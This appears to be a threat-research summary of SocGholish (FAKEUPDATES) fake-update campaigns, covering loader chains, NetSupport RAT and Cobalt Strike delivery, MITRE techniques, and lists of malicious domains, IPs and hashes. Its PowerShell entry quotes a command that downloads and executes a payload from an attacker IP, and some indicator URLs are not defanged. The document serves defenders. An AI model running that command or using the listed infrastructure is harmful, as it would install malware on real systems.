Threat Research

SocGholish Campaigns and Initial Access Kit

Securonix

The article analyzes SocGholish (aka FAKEUPDATES) campaigns and how they function as a major initial-access vector through fake updates, compromised sites, and phishing-style techniques, detailing loader chains and observed IOCs. It covers campaigns delivering NetSupport RAT and Cobalt Strike loaders, including XLL/.NET-based obfuscation, pivot points, and a wide set of indicators linking infrastructure and payloads. #SocGholish #FAKEUPDATES #NetSupportRAT #CobaltStrike #BlisterLoader #EvilCorp

Keypoints

  • SocGholish (FAKEUPDATES) has evolved into a prominent corporate initial-access framework and is linked to Evil Corp through partnerships and operational ties.
  • Campaigns regularly employ fake software updates via drive-by downloads and links in email spam, with specific campaigns such as fake captcha sites and compromised websites.
  • Loader chains include .NET-based loaders with obfuscated strings and LNK/VHD delivery leading to NetSupport RAT or Cobalt Strike (“Blister”) loader variants.
  • Many campaigns leverage cross-platform infrastructure (HTTPS traffic, multiple gateways) and extensive environment profiling before deployment, including registry-based persistence and WMI-based discovery.
  • Persistence and evasion techniques include using Run keys for autorun, PowerShell-based payloads, and XOR/obfuscation wrappers (ServHelper-like patterns) to load additional components.
  • Attack infrastructure features a mix of domains, IPs, and compromised sites that serve as redirectors and C2 endpoints, with observed IOCs spanning numerous domains, hashes, and file names.

MITRE Techniques

  • [T1189] Drive-by Compromise – Drive-by download campaigns normally consist of a website with injected javascript code. ‘Drive-by download campaigns normally consist of a website with injected javascript code.’
  • [T1566.001] Spearphishing Link – Use of links in email spam to deliver malicious content. ‘through links in email spam.’
  • [T1059.001] PowerShell – The loader chain includes explicit PowerShell invocation to fetch and execute payloads. ‘process call create “cmd /c start /min C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -c IEX (iwr –usebasicparsing ‘http://5.252.178.213/restore.dat’)”!%SystemRoot%System32SHELL32.dll’
  • [T1027.001] Obfuscated/Compressed Data and Information – .NET loaders obfuscate important strings to hinder analysis. ‘These .NET based loaders contain a simplistic way that they obfuscate all their important strings’
  • [T1047] WMI – Use of WMI queries to enumerate system information. ‘Some WMI queries:’
  • [T1547.001] Boot or Logon Autostart Execution – Registry Run Keys/Startup Folder persistence. ‘The registry key Run’ and ‘Sets a run key and starts the process.’
  • [T1071.001] Web Protocols – HTTPS-based C2 communications. ‘along with communicating over HTTPS, this sample talked to irsbusinessaudit[.]net which was leveraged as part of the aforementioned captcha campaigns leading to NetSupport RAT.’
  • [T1082] System Information Discovery – Extensive environment profiling before deployment. ‘The script will end up gathering a lot of information which is sent off:’
  • [T1041] Exfiltration Over C2 Channel – Data gathered from the infected system is exfiltrated to C2 endpoints as part of profiling and delivery. ‘This is sent off’ (context within init/profiling steps).

Indicators of Compromise

  • [Domain] irsbusinessaudit.net – Used in captcha campaigns and as a C2/redirector domain. Example: irsbusinessaudit[.]net/captcha.php
  • [Domain] design.lawrencetravelco.com – Redirector site used in drive-by chains. Example: https://design.lawrencetravelco.com/report?r=dj1iNjI0OWFiNTViODVhMDIxZmRjZCZjaWQ9MjYy
  • [IP Address] 5.252.178.213 – Used in XLL loader campaigns and LNK file distributions. Example: 5.252.178[.]213/restore.dat
  • [IP Address] 149.28.68.114 – Listed as a download/source in the chain (restore.dat downloader). Example: form_irs_check.png
  • [File Hash] 9d8d289dd7fe149e89152983e40b2c1031e0dba3de9d89513163068bfb27a314
  • [File Hash] ccc0204486cbf8b6db43711ddf8d847cfc15d5f713c60b53c461c4e4eeeb1a4f
  • [File Name] Chrome.Update.50e772.js – Part of the fakeupdate campaign package.
  • [File Name] stage_2.js – Initial loader stage in the SocGholish chain.
  • [URL] https://irsbusinessaudit[.]net/captcha.php – Redirector/captcha site used in campaigns.
  • [URL] https://design.lawrencetravelco.com/report?r=dj1iNjI0OWFiNTViODVhMDIxZmRjZCZjaWQ9MjYy – Example of a redirector URL used in the campaign.
  • [ZIP] DOo0gd4h.zip – ZIP package containing loaders and scripts.
  • [File Hash] 56de90d87bb9afc5345991b910a17cf0c6ee95cb97ea4b6de87fd93a8f22c9c0 – Chrome.Update.50e772.js payload hash (example).

Read more: https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint